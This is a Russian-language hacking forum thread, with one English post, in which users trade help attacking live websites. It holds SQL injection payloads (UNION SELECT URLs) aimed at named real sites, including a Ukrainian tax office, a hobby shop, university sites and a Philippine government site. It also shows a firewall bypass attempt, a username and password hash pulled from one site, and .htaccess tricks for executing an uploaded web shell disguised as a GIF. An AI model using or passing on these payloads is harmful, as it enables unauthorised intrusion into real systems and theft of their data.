Ваши вопросы по уязвимостям.

Ничего ты тут не сделаешь

UPD
Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )

 

Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку

PHP:

    $sel = $db->Query ( "SELECT * FROM admin WHERE login='" . $this->adm_name . "'" );
        
                        if (0 < $db->NumRows ( $sel )) {
                            $this->adm_data = $db->FetchArray ( $sel );
                            if ($this->adm_data ['password'] == $this->adm_pass) {
                                $_SESSION ['acplogin'] = $this->adm_data ['login'];
                                $_SESSION ['acppass'] = $this->adm_data ['password'];
                                $this->redirect ( "admin.php" );
                            } else {
                                $this->redirect ( "admin.php?err=pError" );
                            } 


все портит эта кавычка

 

Vbulletin 4.1.7

Code:

http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='

Можно ли из этого что-то извлечь?

 

Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user

 

Code:

http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+

Не шарю как вывести

 

http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+


что вывести то?

 

Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...

 

natasha:0444730b0844225c

что именно понять то?

 

бляяяя Я не увидел где оно выводит .
Gorev, спасибо!

 

Code:

http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+

 

Code:

www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.

 

Иньекции нету

 

A_n_d_r_e_i прав. Но не стоит опускать руки. Есть другие

HTML:

http://www.hbs-guu.ru/news3.html?item_id=-139+and+1=1+union+select+1,2,version(),4,5,6--+f

 

Народ вот копался на 1м IPB форуме нашел там страничку с вот такими параметрами:

Code:

http://site.com/forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=forums&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_app_filters[core][sortKey]=date&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_tags=17&search_term=&sid=66bd76f74ed93a979f202dc202ec3fa4

На этой странице выдало:

Code:

Site.com Driver Error

There appears to be an error with the database.

If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.

You can try to refresh the page by clicking here 

Может ли эта ошибка каким нибудь способом вести к Sql иньекции или еще чему нибудь?

 

I have a problem here.

Code:

http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8

Code:

WebKnight Application Firewall Alert


Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.


For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight

How do I execute?

 

XSS

У меня такой нубский вопрос...
Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?

 

Бро, другой параметр пробуй

HTML:

http://www.hobbyshop.com.ua/goods.php?id=4766'-999.9+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--+f

 

Политика безопасности браузеров. Для жс запрет на работу с фс.

 

Привет, помогите разобраться:
На сайте есть fckeditor 2.3.2, Заливаю шелл smile.php.gif > smile_php.gif и хтацес, в котором
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
При заходе на шелл target.com/files/smile_php.gif его просто качает..
В чем проблема ?

 

Попробуй залить .htaccess с содержанием:

PHP:

AddHandler application/x-httpd-php .gif